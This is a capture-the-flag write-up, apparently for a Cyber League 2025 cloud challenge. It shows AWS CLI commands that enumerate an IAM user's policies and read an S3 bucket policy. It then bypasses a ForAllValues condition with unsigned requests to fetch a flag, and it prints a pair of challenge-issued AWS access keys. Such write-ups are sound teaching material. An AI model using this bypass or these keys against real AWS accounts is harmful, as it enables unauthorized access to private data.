Perfect Storage

Description

The intern is exploring S3 buckets to host internal documents. He insists that he has scoped the IAM policy correctly to restrict access solely to the admin. Prove the intern wrong by escalating your user privileges and access the secret document!

Attached File: user.txt

aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = ylEfloqS+B+O56WesG7qg8fEl0F1WD79OyckBuTf

Solve

Since the challenge description mentioned IAM, lets attempt to perform IAM enumeration on the user.

aws iam list-attached-user-policies --user-name thisisauselessuserfortesting --profile perfect_storage

Doing standard enumeration, we noticed the user have the policy hackerman101 attached. Lets attempt to enumerate the policy now.

aws iam get-policy --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --profile perfect_storage
aws iam get-policy-version --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --version-id v2 --profile perfect_storage

In the iam policy, we noticed that the user thisisauselessuserfortestinghas the get bucket permission for perfect-storage-7815696ecbf1c96

However, when attempting to access the s3 bucket, we are met with an explicit deny in an identity based policy.

Lets attempt to get the bucket policy to see if theres any policy that is explicitly denying our permission.

aws s3api get-bucket-policy --bucket perfect-storage-7815696ecbf1c96 --profile perfect_storage

I have attached the prettified

{
    "Policy": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": "*",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96/*",
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96"
                ],
                "Condition": {
                    "ForAllValues:StringLike": {
                        "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"
                    }
                }
            }
        ]
    }
}

Here we can see the bucket policy allow all principal (ie any user) to perform list bucket and get object. However, there is a condition where the user principal arn is arn:aws:iam::666666666666:user/admin

The ForAllValuesis overtly permissive according to aws documentation.

Single-valued vs. multivalued context keys - AWS Identity and Access Management

So if we are able to pass the PrincipalArn as empty, we are able to bypass this policy.

aws s3 ls s3://perfect-storage-7815696ecbf1c96 --profile perfect_storage
aws s3 ls s3://perfect-storage-7815696ecbf1c96  --no-sign-request

Comparing the output between both s3 list object, we can see the second one with the --no-sign-requestis able to bypass the policy.

aws s3 cp s3://perfect-storage-7815696ecbf1c96/flag.txt - --no-sign-request

PreviousCyber League 2025 Major 1 Nextcatalog commits

Last updated 5 months ago

Was this helpful?